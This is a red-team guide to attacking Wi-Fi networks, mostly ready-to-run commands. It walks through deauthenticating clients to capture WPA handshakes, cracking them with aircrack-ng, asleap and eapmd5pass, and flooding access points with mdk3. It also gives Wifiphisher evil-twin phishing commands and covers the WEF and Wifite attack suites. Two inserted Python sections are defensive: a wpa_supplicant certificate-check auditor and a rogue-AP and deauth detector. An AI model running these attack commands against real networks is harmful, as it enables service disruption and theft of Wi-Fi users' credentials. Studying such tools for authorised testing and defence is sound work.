A Red Teamer’s Guide to Wi-Fi Exploits

Wireless Technology and Frequency Spectrum Overview

Understanding the frequency spectrum and its various applications is crucial for professionals working with wireless technologies. This document outlines the frequency ranges and associated technologies, providing insights into their usage and characteristics.

Frequency Bands and Technologies

  1. RFID (Radio Frequency Identification)
    • LF (Low Frequency): 120-150 kHz
    • HF (High Frequency): 13.56 MHz
    • UHF (Ultra-High Frequency): 433 MHz
  2. Keyless Entry Systems
    • North America: 315 MHz
    • Europe and Asia: 433.92 MHz
  3. Cellular Frequencies (US)
    • 698-894 MHz: LTE Band 12, 13, 17
    • 1710-1755 MHz: AWS (Advanced Wireless Services)
    • 1850-1910 MHz: PCS (Personal Communications Service)
    • 2110-2155 MHz: AWS
  4. Global Positioning System (GPS)
    • L1: 1575.42 MHz
    • L2: 1227.60 MHz
  5. L Band
    • Frequency Range: 1-2 GHz
  6. 802.15.4 (ZigBee)
    • Europe: 868 MHz
    • US and Australia: 915 MHz
  7. 802.15.1 (Bluetooth)
    • Frequency Range: 2.4-2.4835 GHz
  8. Wi-Fi Standards
    • 802.11 b/g: 2.4 GHz
    • 802.11a: 5.0 GHz
    • 802.11n: 2.4/5.0 GHz
  9. Satellite and Microwave Communication
    • C Band: 4-8 GHz
    • Ku Band: 12-18 GHz
    • K Band: 18-26.5 GHz
    • Ka Band: 26.5-40 GHz

Tools and Commands

To work effectively with these frequencies and technologies, various tools and commands are used by engineers and technicians:

FCC ID Lookup

For identifying devices and their frequency allocations, the FCC ID lookup tool is invaluable:

Frequency Databases

Accessing a comprehensive database for frequency information is essential for planning and troubleshooting:

Practical Commands

Linux Networking Commands

View Wireless Interfaces:

iwconfig

Monitor Mode Activation:

airmon-ng start wlan0

Packet Capture:

airodump-ng wlan0mon

Bluetooth Scanning

  • Scan for Bluetooth Devices:
hcitool scan

ZigBee Network Analysis

  • Scan for ZigBee Channels:
sudo zbstumbler /dev/ttyUSB0

Wireless Hacking with Kismet and Linux Wi-Fi Commands

Kismet is a powerful wireless network detector, sniffer, and intrusion detection system. It supports multiple wireless cards and is compatible with various protocols. Below is a comprehensive guide to Kismet commands and essential Linux Wi-Fi commands for effective wireless network management and analysis.

Kismet Commands

Kismet provides a variety of commands for managing and analyzing wireless networks. Here is a detailed table of the Kismet commands along with their descriptions:

Command | Description
e | Show Kismet servers
h | Display help
z | Full-screen display
n | Show current network number
m | Mute sound
i | Network details
t | Tag or untag a network
s | Sort the network list
g | Group tagged networks
l | Show wireless card power levels
u | Ungroup the current group
d | Display settings
c | Show current network users
r | Packet rate graph
L | Lock channel to the selected channel
a | Display network statistics
H | Return to normal channel hopping
p | Packet type capture
+/- | Expand/collapse network groups
f | Center the network
CTRL+L | Redraw the screen
w | Track alerts
Q | Quit Kismet
X | Close popup window

Essential Linux Wi-Fi Commands

Managing Wi-Fi networks in Linux involves using various command-line tools for configuration, monitoring, and troubleshooting. Below is a table of essential Linux Wi-Fi commands:

Command | Description
iwconfig | Configure wireless network interfaces
rfkill list | Display the status of RF (radio frequency) devices
rfkill unblock all | Enable all RF devices (e.g., Wi-Fi)
airodump-ng mon0 | Capture wireless traffic on the mon0 monitor-mode interface

Practical Examples

Using Kismet

Starting Kismet

sudo kismet
  1. Viewing Network Details
    • Press i to see the details of a selected network.
  2. Sorting the Network List
    • Press s to sort the list of detected networks.
  3. Displaying Current Users
    • Press c to display the users connected to the current network.

Using Linux Wi-Fi Commands

Configuring Wireless Interfaces

sudo iwconfig wlan0 essid "YourNetworkSSID" key s:password

Checking RF Device Status

sudo rfkill list

Unblocking All RF Devices

sudo rfkill unblock all

Monitoring Wireless Interfaces

sudo airodump-ng mon0

Connecting to Wireless Networks in Linux

Below is a detailed guide on connecting to various types of wireless networks in Linux using command-line tools. This guide covers connections to unsecured networks, WEP, WPA-PSK, and WPA-Enterprise networks.

Connecting to an Unsecured Network

To connect to an unsecured (open) network, use the following commands:

Command | Description
iwconfig ath0 essid $SSID | Set the SSID of the wireless network
ifconfig ath0 up | Bring the wireless interface up
dhclient ath0 | Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "OpenNetwork"
ifconfig ath0 up
dhclient ath0

Connecting to a WEP Network

To connect to a WEP-secured network, use the following commands:

Command | Description
iwconfig ath0 essid $SSID key s:$KEY | Set the SSID and the WEP key (the s: prefix marks an ASCII key)
ifconfig ath0 up | Bring the wireless interface up
dhclient ath0 | Obtain an IP address via DHCP

Example:

iwconfig ath0 essid "WEPNetwork" key s:your_wep_key
ifconfig ath0 up
dhclient ath0

Connecting to a WPA-PSK Network

To connect to a WPA-PSK (Pre-Shared Key) network, use the following commands:

Command | Description
iwconfig ath0 essid $SSID | Set the SSID of the wireless network
ifconfig ath0 up | Bring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-psk.conf | Start the WPA supplicant daemon in the background with the config
dhclient ath0 | Obtain an IP address via DHCP

Example:

  1. Create a WPA-PSK configuration file (wpa-psk.conf):
network={
    ssid="WPA_PSK_Network"
    psk="your_wpa_psk_password"
}
  2. Run the commands:
iwconfig ath0 essid "WPA_PSK_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

Connecting to a WPA-Enterprise Network

To connect to a WPA-Enterprise network, use the following commands:

Command | Description
iwconfig ath0 essid $SSID | Set the SSID of the wireless network
ifconfig ath0 up | Bring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-ent.conf | Start the WPA supplicant daemon in the background with the config
dhclient ath0 | Obtain an IP address via DHCP

Example:

Create a WPA-Enterprise configuration file (wpa-ent.conf):

network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    password="your_password"
    phase2="auth=MSCHAPV2"
}

Run the commands:

iwconfig ath0 essid "WPA_Enterprise_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0
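The wpa-ent.conf above sets no ca_cert and no server-name match, so the supplicant accepts any RADIUS server certificate and an evil twin with its own RADIUS server gets the MSCHAPv2 exchange. The following check is an added example, not code from the page or from wpa_supplicant: it parses wpa_supplicant network blocks and flags tunneled-EAP blocks that lack ca_cert, a server-name match or anonymous_identity, with the page's block beside a hardened variant whose CA file path and RADIUS hostname are placeholders.

```python
import re

# The page's WPA-Enterprise block, copied here as constructed input for the check.
WEAK_CONF = """
network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    password="your_password"
    phase2="auth=MSCHAPV2"
}
"""

# Same network with server-certificate validation and an anonymous outer identity.
# The CA file path and the RADIUS hostname are placeholders, not values from the page.
HARDENED_CONF = """
network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    anonymous_identity="anonymous"
    password="your_password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.example.com"
}
"""

# EAP methods that tunnel an inner credential exchange through TLS to the server.
TUNNELED_EAP = {"PEAP", "TTLS", "FAST"}
# Any of these pins the accepted server certificate to a name, not just to a CA.
SERVER_NAME_OPTS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")


def parse_network_blocks(text):
    """Return one {option: value} dict per network={...} block, quotes stripped."""
    blocks = []
    for body in re.findall(r"network=\{(.*?)\}", text, re.S):
        opts = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            key, _, value = line.partition("=")  # phase2="auth=MSCHAPV2" keeps its inner '='
            opts[key.strip()] = value.strip().strip('"')
        blocks.append(opts)
    return blocks


def audit_network(opts):
    """Findings for one block; an empty list means the EAP settings validate the server."""
    findings = []
    if "WPA-EAP" not in opts.get("key_mgmt", "").split():
        return findings  # PSK / open networks are out of scope for this check
    if opts.get("eap") in TUNNELED_EAP:
        if "ca_cert" not in opts and "ca_path" not in opts:
            findings.append("ca_cert missing: any RADIUS server certificate is accepted")
        if not any(opt in opts for opt in SERVER_NAME_OPTS):
            findings.append("domain_suffix_match missing: any certificate from the CA is accepted")
        if "anonymous_identity" not in opts:
            findings.append("anonymous_identity missing: real username sent as the cleartext outer identity")
    return findings


def audit_config(text):
    """List of (ssid, findings) pairs for every network block in a config file."""
    return [(b.get("ssid", "?"), audit_network(b)) for b in parse_network_blocks(text)]
```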

Wi-Fi Network Testing in Linux

Testing Wi-Fi networks in Linux involves a series of commands to place wireless interfaces into monitor mode, capture handshakes, perform brute force attacks, and conduct denial-of-service (DoS) attacks. This guide provides a structured approach to these tasks using common tools such as airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, mdk3, and others.

Setting Up Monitor Mode

To begin testing, you need to place your wireless interface into monitor mode. This allows you to capture all wireless traffic in your vicinity.

Command | Description
airmon-ng stop ath0 | Remove the existing ath0 interface so a fresh one can be created in monitor mode
airmon-ng start wifi0 | Start monitor mode on the wifi0 interface
iwconfig ath0 channel $CH | Set ath0 to channel $CH

Example:

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel 6

Capturing Client Handshake

Capturing the WPA/WPA2 handshake is crucial for performing brute force attacks.

Command | Description
airodump-ng -c $CH --bssid $AP -w file ath0 | Capture traffic on channel $CH from access point $AP and save it to file
aireplay-ng -0 10 -a $AP -c $CLIENT ath0 | Send 10 deauthentication frames to client $CLIENT on behalf of $AP so it reconnects and the handshake is captured

Example:

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture ath0
aireplay-ng -0 10 -a 00:11:22:33:44:55 -c 00:22:33:44:55:66 ath0

Brute Force Handshake Attack

Once the handshake is captured, a brute force attack can be attempted to find the WPA-PSK.

Command | Description
aircrack-ng -w wordlist capture.cap | Brute force the WPA-PSK using wordlist against capture.cap
asleap -r capture.cap -w dict.asleap | Brute force LEAP using dict.asleap against capture.cap
eapmd5pass -r capture.cap -w wordlist | Brute force EAP-MD5 using wordlist against capture.cap

Example:

aircrack-ng -w wordlist.txt capture.cap
asleap -r capture.cap -w dict.asleap
eapmd5pass -r capture.cap -w wordlist.txt

Denial of Service (DoS) Attack

Performing a DoS attack can flood the network with various types of packets, disrupting service.

Command | Description
mdk3 int a -a $AP | Authentication flood against $AP (int is the monitor-mode interface)
mdk3 int b -c $CH | Beacon flood on channel $CH

Example:

mdk3 wlan0 a -a 00:11:22:33:44:55
mdk3 wlan0 b -c 6

Wifiphisher Overview and Usage Guide

Wifiphisher is a powerful, flexible, modular, easy-to-use tool for conducting man-in-the-middle (MiTM) attacks to obtain credentials from unsuspecting Wi-Fi users. This tool runs on Linux and is especially effective when deployed on a Raspberry Pi. It supports various Wi-Fi association techniques, such as Evil Twin, KARMA, and Known Beacons, and comes with community-driven phishing templates for different scenarios.

Key Features

  • Powerful: Capable of running for extended periods on devices like Raspberry Pi, employing various Wi-Fi association techniques.
  • Flexible: Supports numerous arguments and community-driven phishing templates.
  • Modular: Users can write Python modules to expand functionality or create custom phishing scenarios.
  • Easy to Use: Beginners can start with simple commands, while advanced users can utilize the full feature set.
  • Research-Backed: Incorporates state-of-the-art phishing techniques disclosed by developers.
  • Community-Supported: Developed and maintained by an active community.
  • Free: Available for free download with full source code under the GPLv3 license.

How It Works

Wi-Fi phishing with Wifiphisher involves two main steps:

  1. Establishing a MiTM Position: Wifiphisher uses techniques such as Evil Twin, KARMA, and Known Beacons to get Wi-Fi clients to associate with its rogue access point without their users noticing.
  2. Performing Phishing Attacks: Once a MiTM position is established, various phishing attacks can be conducted, such as data sniffing or web-based credential capture.

Installation

To install the latest development version, use the following commands:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Example Commands

  1. Manual Interface Selection and Firmware Upgrade Scenario:
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap
  • -aI wlan0: Use wlan0 for spawning the rogue Access Point.
  • -jI wlan4: Use wlan4 for DoS attacks.
  • -p firmware-upgrade: Perform the “Firmware Upgrade” scenario.
  • --handshake-capture handshake.pcap: Verify the captured Pre-Shared Key against the handshake file.
  2. Automatic Interface Selection and Plugin Update Scenario:
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
  • --essid CONFERENCE_WIFI: Target the Wi-Fi network with ESSID “CONFERENCE_WIFI”.
  • -p plugin_update: Perform the “Plugin Update” scenario.
  • -pK s3cr3tp4ssw0rd: Protect the Evil Twin with PSK “s3cr3tp4ssw0rd”.
  3. Open Wi-Fi Network and OAuth Login Scenario:
wifiphisher --essid "FREE WI-FI" -p oauth-login -kB
  • --essid "FREE WI-FI": Spawn an open Wi-Fi network with ESSID “FREE WI-FI”.
  • -p oauth-login: Perform the “OAuth Login” scenario.
  • -kB: Use the Known Beacons technique.

Command-Line Options

Below is a table of useful command-line options for Wifiphisher:

Short Form | Long Form | Description
-h | --help | Show help message and exit
-i | --interface | Choose an interface that supports both AP and monitor modes
-eI | --extensionsinterface | Choose an interface that supports monitor mode for running extensions
-aI | --apinterface | Choose an interface that supports AP mode for spawning an AP
-pI | --protectinterface | Specify interfaces protected from NetworkManager
-kN | --keepnetworkmanager | Do not kill NetworkManager
-nE | --noextensions | Do not load any extensions
-e | --essid | Enter the ESSID of the rogue Access Point
-pPD | --phishing-pages-directory | Search for phishing pages in the specified directory
-p | --phishingscenario | Choose the phishing scenario to run
-pK | --presharedkey | Add WPA/WPA2 protection on the rogue Access Point
-qS | --quitonsuccess | Stop the script after successfully retrieving one pair of credentials
-lC | --lure10-capture | Capture BSSIDs during the AP selection phase as part of the Lure10 attack
-lE | --lure10-exploit | Exploit the captured BSSIDs to fool the Windows Location Service
-iAM | --mac-ap-interface | Specify the MAC address of the AP interface
-iEM | --mac-extensions-interface | Specify the MAC address of the extensions interface
-iNM | --no-mac-randomization | Do not change any MAC address
-hC | --handshake-capture | Capture WPA/WPA2 handshakes for verifying the passphrase
-dE | --deauth-essid | Deauth all BSSIDs in the WLAN with the specified ESSID
-dC | --deauth-channels | Channels to deauth
(none) | --logging | Enable logging. Output will be saved to the wifiphisher.log file
-lP | --logpath | Determine the full path of the logfile
-cP | --credential-log-path | Determine the full path of the file that will store any captured credentials
-cM | --channel-monitor | Monitor whether the target access point changes channel
(none) | --payload-path | Enable the payload path. Intended for use with scenarios that serve payloads
-wP | --wps-pbc | Monitor whether the button on the WPS-PBC Registrar side is pressed
-wAI | --wpspbc-assoc-interface | The WLAN interface used for associating to the WPS Access Point
-kB | --known-beacons | Perform the Known Beacons Wi-Fi automatic association technique
-fH | --force-hostapd | Force the usage of the hostapd installed in the system
(none) | --dnsmasq-conf DNSMASQ_CONF | Determine the full path of the dnsmasq.conf file
-dK | --disable-karma | Disable the KARMA attack
-pE | --phishing-essid | Determine the ESSID you want to use for the phishing page

WEF (WiFi Exploitation Framework) Overview and Usage Guide

WEF is a comprehensive tool designed for executing a variety of Wi-Fi attacks. It supports numerous attack types, automatic handshake capture and cracking, and provides multiple templates for EvilTwin attacks in different languages. This guide provides an overview of its features, installation process, common usage commands, and available attacks.

Key Features

  • WPA/WPA2, WPS, and WEP Attacks: Supports a wide range of attacks on different Wi-Fi security protocols.
  • Automatic Handshake Capture and Cracking: Facilitates easy capture and cracking of WPA/WPA2 handshakes.
  • Multiple Templates for EvilTwin Attack: Offers various templates in different languages for conducting EvilTwin attacks.
  • Monitor Mode Management: Allows enabling/disabling monitor mode and viewing interface info (frequencies, chipset, MAC address).
  • 2.4 GHz and 5 GHz Support: Capable of attacking networks on both frequency bands.
  • Informative Attack Logs: Provides detailed logs of the conducted attacks.
  • Custom Wordlist Selector: Enables selection of custom wordlists when cracking.
  • Language Support: Available in English and Spanish.

Installation

git clone https://github.com/D3Ext/WEF
bash wef

Available Attacks

Attack Type | Description
Deauthentication Attack | Disconnects clients from a network.
WIDS Confusion Attack | Confuses Wireless Intrusion Detection Systems.
Authentication Attack | Floods the AP with authentication requests.
Beacon Flood Attack | Floods the airwaves with fake beacon frames.
TKIP Attack (Michael Shutdown Exploitation) | Exploits vulnerabilities in TKIP.
Pixie Dust Attack | Offline attack against WPS networks.
Null Pin Attack | Tests all-zero WPS pins.
PIN Bruteforce Attack | Attempts to brute-force WPS pins.
ARP Replay Attack | Generates traffic to capture IVs for WEP cracking.
HIRTE Attack | Attacks WEP-protected networks via clients.
Caffe Latte Attack | Cracks WEP keys by targeting clients.
Fake Authentication Attack | Fakes authentication to the target AP.
WPA/WPA2 Handshake Capture Attack | Captures WPA/WPA2 handshakes for cracking.
PMKID Attack | Exploits a vulnerability in WPA/WPA2 for handshakes.
EvilTwin Attack | Creates a rogue AP to capture credentials.

Command-Line Options

Short Form | Long Form | Description
-i | --interface | Specify your network adapter interface in managed mode
-h | --help | Show the help panel
(none) | --version | Print the version and exit

GeoWiFi: WiFi Geolocation Data Search Tool

GeoWiFi is a powerful tool designed to search WiFi geolocation data by BSSID and SSID using various public databases. This guide covers its key features, installation, usage, and command options.

Key Features

  • Database Support: GeoWiFi queries multiple databases including Wigle, Apple, Google, Milnikov, WifiDB, and Combain.
  • Output Flexibility: Supports output in map or JSON format.
  • Custom Configuration: Allows API configuration through a YAML file.
  • Docker Support: Can be run using Docker for ease of deployment.

Installation

Prerequisites

  • Python 3
  • Windows Terminal (recommended for Windows users to display emojis)

Configuration

GeoWiFi uses a configuration file located at gw_utils/config.yaml to store API keys and other settings.

Example Configuration (config.yaml):

wigle_auth: "your_wigle_encoded_key"
google_api: "your_google_api_key"
combain_api: "your_combain_api_key"
no-ssl-verify: false

Usage

Command-Line Interface

usage: geowifi.py [-h] [-s {bssid,ssid}] [-o {map,json}] identifier

Search for information about a network with a specific BSSID or SSID.

positional arguments:
  identifier            The BSSID or SSID of the network to search for.

options:
  -h, --help            Show this help message and exit
  -s {bssid,ssid}, --search-by {bssid,ssid}
                        Specifies whether to search by BSSID or SSID (default: bssid)
  -o {map,json}, --output-format {map,json}
                        Specifies the output format for the search results (default: map)

Examples

Search by BSSID:

python3 geowifi.py -s bssid 00:11:22:33:44:55

Search by SSID:

python3 geowifi.py -s ssid "NetworkName"

Output in JSON Format:

python3 geowifi.py -s bssid 00:11:22:33:44:55 -o json

Output in Map Format:

python3 geowifi.py -s ssid "NetworkName" -o map

PiDense: Monitoring Illegal Wireless Network Activities

Purpose

PiDense is designed to monitor and detect illegal wireless network activities. It focuses on identifying suspicious SSID broadcasts, detecting deauthentication attacks, and monitoring various wireless network anomalies such as KARMA attacks and WiFi Pineapple activities.

Capabilities

  • Detects similar SSID broadcasts
  • Detects SSID brute force attacks
  • Detects beacon floods
  • Monitors deauthentication attacks
  • Identifies unencrypted wireless network density
  • Monitors SSID broadcasts against a blacklist
  • Detects KARMA attacks
  • Monitors WiFi Pineapple activities

Soon to be Added Features

  • Pcap parsing
  • Company name setting for monitoring illegal wireless activities
  • Probe request analysis for SSID brute force detection
  • Beacon analysis for SSID flood detection

Working Principle

PiDense operates by monitoring wireless network activities and analyzing broadcasted SSIDs, encryption types, and detecting anomalies. It uses scapy for packet manipulation and analysis, and provides alerts when suspicious activities are detected.
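As an added example, not PiDense's own code, the checks below implement four of the capabilities listed above over a list of parsed management frames: a sliding-window deauth-rate check, a beacon-flood threshold, KARMA-style probe-response detection and look-alike SSID matching. The Frame record, the thresholds and the sample capture are constructed for this example rather than taken from PiDense.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Frame:
    """One 802.11 management frame reduced to the fields the checks need
    (the values you would read from scapy's Dot11/Dot11Beacon/Dot11ProbeResp layers)."""
    ts: float        # capture time in seconds
    subtype: str     # "beacon", "probe_resp" or "deauth"
    src: str         # transmitter address (addr2)
    ssid: str = ""   # SSID element, when the frame carries one


def deauth_flood_sources(frames, window=1.0, threshold=10):
    """Transmitters that sent more than `threshold` deauth frames within any `window` seconds."""
    per_src = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            per_src[f.src].append(f.ts)
    flagged = set()
    for src, times in per_src.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:   # slide the window so it spans at most `window` seconds
                lo += 1
            if hi - lo + 1 > threshold:
                flagged.add(src)
                break
    return flagged


def beacon_flood(frames, max_bssids=30):
    """True when more distinct BSSIDs are beaconing than the site is expected to have."""
    return len({f.src for f in frames if f.subtype == "beacon"}) > max_bssids


def karma_responders(frames, max_ssids=3):
    """Transmitters answering probes for many different SSIDs (KARMA / Pineapple behaviour)."""
    ssids = defaultdict(set)
    for f in frames:
        if f.subtype == "probe_resp" and f.ssid:
            ssids[f.src].add(f.ssid)
    return {mac for mac, s in ssids.items() if len(s) > max_ssids}


def _normalize(ssid):
    # case-fold, drop separators and map look-alike digits so "C0rp_WiFi" matches "Corp-WiFi"
    table = str.maketrans({"0": "o", "1": "l", "5": "s", " ": "", "_": "", "-": ""})
    return ssid.casefold().translate(table)


def lookalike_ssids(frames, known):
    """(bssid, ssid) pairs beaconing an SSID that resembles a known one from a BSSID not allowed
    to serve it; `known` maps each legitimate SSID to its set of legitimate BSSIDs."""
    norm_known = {_normalize(s): bssids for s, bssids in known.items()}
    hits = set()
    for f in frames:
        if f.subtype == "beacon" and f.ssid:
            legit = norm_known.get(_normalize(f.ssid))
            if legit is not None and f.src not in legit:
                hits.add((f.src, f.ssid))
    return hits


def analyze(frames, known):
    return {"deauth_flood": deauth_flood_sources(frames), "beacon_flood": beacon_flood(frames),
            "karma": karma_responders(frames), "lookalike": lookalike_ssids(frames, known)}


def sample_frames():
    """Constructed capture: a legitimate AP, a deauth burst, a look-alike beacon, a KARMA responder."""
    ap, rogue = "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    frames = [Frame(i * 0.1, "beacon", ap, "Corp-WiFi") for i in range(5)]
    frames += [Frame(1.0 + i * 0.05, "deauth", rogue) for i in range(15)]  # 15 deauths within 0.7 s
    frames.append(Frame(2.0, "beacon", rogue, "C0rp_WiFi"))
    frames += [Frame(3.0 + i, "probe_resp", rogue, s) for i, s in enumerate(["Home", "Airport", "Hotel", "Cafe"])]
    return frames
```

Run `analyze(sample_frames(), {"Corp-WiFi": {"00:11:22:33:44:55"}})` to see the rogue transmitter flagged for the deauth burst, the KARMA responses and the look-alike SSID while the beacon count stays under the flood threshold.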

Installation and Usage

Requirements

  • Hardware: TP-LINK TL-WN722N
  • Modules: scapy, time, termcolor, argparse
  • Operating System: Kali Linux

Command Options

The following table provides a summary of the primary commands and their usage for PiDense.

Command | Description
git clone https://github.com/WiPi-Hunter/PiDense.git | Clone the PiDense repository from GitHub
pip install scapy termcolor argparse | Install the required Python modules
airmon-ng start wlan0 | Enable monitor mode on wlan0 using airmon-ng
ifconfig wlan0 down | Bring down the wlan0 interface
iwconfig wlan0 mode Monitor | Set wlan0 to monitor mode
ifconfig wlan0 up | Bring up the wlan0 interface
cd PiDense | Navigate to the PiDense directory
python pidense.py -h | Display help information for PiDense

Wifite: Wireless Network Auditing Tool

Wifite is a comprehensive Python script for auditing wireless networks, leveraging existing tools to automate the process of retrieving wireless access point passwords. This guide provides a detailed overview of Wifite’s features, installation, usage, and command options.

Purpose

Wifite automates wireless network attacks by utilizing various existing tools to perform the following actions:

  • WPS Offline Pixie-Dust attack
  • WPS Online Brute-Force PIN attack
  • WPA Handshake Capture + offline crack
  • WPA PMKID Hash Capture + offline crack
  • Various known WEP attacks

Key Features

Feature | Description
WPS Pixie-Dust Attack | Offline brute-force attack on WPS
WPS PIN Attack | Online brute-force attack on the WPS PIN
WPA Handshake Capture | Captures the WPA handshake for offline cracking
WPA PMKID Hash Capture | Captures PMKID hashes for offline cracking
WEP Attacks | Supports multiple WEP attacks including fragmentation, chop-chop, aireplay, etc.
5GHz Support | Supports the 5GHz band for some wireless cards
Automatic Handshake Validation | Validates handshakes with pyrit, tshark, cowpatty, and aircrack-ng
Cracked Password Storage | Stores cracked passwords and handshakes in the current directory
Verbose Mode | Provides detailed output of executed commands for educational purposes
Compatibility | Designed for Kali Linux and ParrotSec, with Python 3 support

Installation

Prerequisites

  • Wireless card capable of Monitor Mode and packet injection
  • Python (compatible with both Python2 and Python3)
  • Required Tools: iwconfig, ifconfig, aircrack-ng suite, tshark, reaver, bully, coWPAtty, pyrit, hashcat, hcxdumptool, hcxpcaptool

Usage

Command-Line Interface

usage: Wifite.py [options]

Wifite is a tool to automate wireless security auditing.

optional arguments:
  -h, --help    show this help message and exit
  -i, --iface   set the wireless interface (default: auto)
  -c, --channel set the channel (default: all channels)
  --pmkid       capture PMKID hashes (default: enabled)
  --pixie       use Pixie-Dust attack (default: enabled)
  --no-pixie    disable Pixie-Dust attack
  --wps-only    attack only WPS-enabled networks
  --no-wps      do not attack WPS-enabled networks
  --crack       crack captured handshakes/PMKID hashes with a wordlist
  --no-deauths  do not send deauth packets
  -v, --verbose increase verbosity of output

Examples

  1. Run Wifite with Default Settings: sudo ./Wifite.py
  2. Capture PMKID Hashes Only: sudo ./Wifite.py --pmkid
  3. Disable Pixie-Dust Attack: sudo ./Wifite.py --no-pixie
  4. Attack Only WPS-Enabled Networks: sudo ./Wifite.py --wps-only
  5. Crack Captured Handshakes with a Wordlist: sudo ./Wifite.py --crack -w /path/to/wordlist.txt
